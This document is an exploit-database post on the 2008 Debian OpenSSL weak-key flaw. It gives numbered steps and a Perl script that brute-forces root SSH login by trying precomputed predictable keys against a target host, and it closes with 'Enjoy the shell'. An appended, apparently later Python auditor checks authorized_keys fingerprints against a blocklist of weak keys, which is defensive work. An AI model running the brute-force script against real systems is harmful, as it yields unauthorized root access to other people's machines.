The Debian OpenSSL issue means that only 65,536 possible SSH keys can be generated, because the only entropy is the PID of the process generating the key.

This means that the following Perl script can be used with the precalculated SSH keys to brute-force the SSH login. It works if such a key is installed on an unpatched Debian system, or on any other system manually configured to use one.

On an unpatched system, which doesn't need to be Debian, do the following:

Keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

***E-DB Note: Mirror ~ https://github.com/g0tmi1k/debian-ssh***

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
   https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)

2. Extract it to a directory

3. Enter into /root/.ssh/authorized_keys an SSH RSA key with 2048 bits, generated on an unpatched Debian (this is the key this exploit will break)

4. Run the Perl script and give it the location where you extracted the bzip2 archive mentioned above.

#!/usr/bin/perl
# number of candidate keys handed to each ssh invocation (one -i per key)
my $keysPerConnect = 6;

unless ($ARGV[1]) {
    print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
    print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
    print "By mm\@deadbeef.de\n";
    exit 0;
}

chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
    chomp;
    # only files with purely numeric names are treated as candidate keys
    next unless m,^\d+$,;
    push(@a, $_);
    if (scalar(@a) > $keysPerConnect) {
        # offer the whole batch of keys within a single ssh connection
        system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
        @a = ();
    }
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]
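As the defender's counterpart to the post above (an added example; it is not part of the original post and not code from HD Moore's key set): a small Python auditor that parses an authorized_keys file, computes the OpenSSH SHA256 fingerprint of every key, reports the RSA modulus size, and flags any key whose fingerprint is on a blocklist of known-weak keys. This is the same idea as the ssh-vulnkey check Debian shipped for this bug, which compared installed keys against a blocklist of the predictable keys (the historical lists used a different fingerprint format). The blocklist contents, the key blobs, the authorized_keys text and all helper names here are constructed placeholders; a real run loads the published weak-key fingerprints into WEAK_FINGERPRINTS and reads /root/.ssh/authorized_keys.

```python
import base64
import hashlib
import struct

# Key types this simplified parser recognises (certificates and quoted
# options containing spaces are deliberately not handled).
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire 'string': 4-byte big-endian length + data."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(value: int) -> bytes:
    """Encode a non-negative integer as an SSH 'mpint' (leading 0x00 if the high bit is set)."""
    raw = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return _ssh_string(raw)


def _read_string(buf: bytes, off: int):
    """Decode one SSH wire 'string' at offset off; returns (data, next_offset)."""
    (length,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + length], off + 4 + length


def encode_rsa_blob(e: int, n: int) -> bytes:
    """Build the ssh-rsa public key blob that authorized_keys stores base64-encoded."""
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def ssh_fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(blob)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """Yield (lineno, keytype, blob, note) per key line; blob is None when unparseable."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Options such as from="..." precede the key type; find the type field.
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            yield lineno, None, None, "no recognised key type / blob"
            continue
        try:
            blob = base64.b64decode(fields[idx + 1], validate=True)
            embedded, _ = _read_string(blob, 0)
        except (ValueError, struct.error):
            yield lineno, fields[idx], None, "blob is not valid base64 / SSH wire format"
            continue
        if embedded != fields[idx].encode():
            yield lineno, fields[idx], None, "key type field does not match blob"
            continue
        yield lineno, fields[idx], blob, " ".join(fields[idx + 2:])


def audit_authorized_keys(text: str, weak_fingerprints) -> list:
    """Return one finding dict per key line, flagging fingerprints on the blocklist."""
    findings = []
    for lineno, keytype, blob, note in parse_authorized_keys(text):
        finding = {"line": lineno, "type": keytype, "bits": None,
                   "fingerprint": None, "weak": False, "note": note}
        if blob is not None:
            if keytype == "ssh-rsa":
                _, off = _read_string(blob, 0)      # skip type string
                _, off = _read_string(blob, off)    # skip public exponent e
                n_bytes, _ = _read_string(blob, off)
                finding["bits"] = int.from_bytes(n_bytes, "big").bit_length()
            finding["fingerprint"] = ssh_fingerprint(blob)
            finding["weak"] = finding["fingerprint"] in weak_fingerprints
        findings.append(finding)
    return findings


# Constructed sample keys: the moduli are arbitrary 2048-bit numbers, NOT real
# RSA moduli and NOT actual Debian weak keys; they only exercise the parser.
SAMPLE_WEAK_BLOB = encode_rsa_blob(65537, (1 << 2047) | 0x1234567)
SAMPLE_OK_BLOB = encode_rsa_blob(65537, (1 << 2047) | 0x7654321)

# Placeholder blocklist: a real deployment loads the published fingerprints of
# the 65,536 predictable keys into this set.
WEAK_FINGERPRINTS = {ssh_fingerprint(SAMPLE_WEAK_BLOB)}

# Constructed authorized_keys contents for the demonstration.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys for the demo",
    "ssh-rsa " + base64.b64encode(SAMPLE_WEAK_BLOB).decode() + " root@unpatched-debian",
    'from="10.0.0.0/8" ssh-rsa ' + base64.b64encode(SAMPLE_OK_BLOB).decode() + " admin@regenerated",
    "ssh-rsa not-base64!! broken@line",
])

if __name__ == "__main__":
    for f in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS):
        print("WEAK " if f["weak"] else "ok   ", f)
```

Any line reported as weak should be removed and the key regenerated on a patched system; lines reported as unparseable deserve a look too, since sshd will silently ignore them.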